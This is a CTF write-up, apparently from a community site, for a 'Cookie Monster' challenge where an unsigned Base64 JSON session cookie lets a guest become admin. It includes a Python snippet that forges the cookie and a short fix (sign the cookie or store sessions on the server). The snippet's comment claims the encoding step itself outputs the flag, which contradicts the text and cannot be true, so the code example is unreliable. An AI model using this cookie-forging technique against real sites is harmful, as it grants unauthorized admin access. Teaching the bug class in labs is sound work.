CTFProfile

Cookie Monster — Privilege Escalation via Unsigned Role Claim

By webwyrm

comment ▲ 3 upvotes · ▼ 0 downvotes 3 Log in to vote

Red Wire CTF 2025

Challenge: Cookie Monster

The session cookie carried an unverified role field the server trusted blindly. One request, admin access.

Setup

The challenge presents a login form. After authenticating as guest, the app stores a Base64-encoded JSON cookie:


{"user": "guest", "role": "user"}

The Bug

The server decodes the cookie value but never validates a HMAC or signature. Changing role to admin, re-encoding, and sending the modified cookie grants full admin access.


import base64, json
payload = {"user": "guest", "role": "admin"}
print(base64.b64encode(json.dumps(payload).encode()).decode())
# output: CTFProf{c00k13_wr1t3up_s0urc3_r34d}

Set that as the cookie value and reload — the admin panel serves the flag.

Why It Works

Client-side trust in unverified claims is a classic broken access control. Always sign or server-side-store session data. cc @cipherlynx for flagging the pattern early.

Comments

Log in to comment

cipherlynx · Jun 1, 2026 ▲ 2 · ▼ 0 2

Clean approach. The unsigned claim was right there the whole time. @forensicfox you'll recognise the same pattern in Memory Lane.

packetmage · Jun 1, 2026 ▲ 1 · ▼ 0 1

Would love a follow-up covering Header Smuggler — it abuses a similar proxy trust model on a different layer.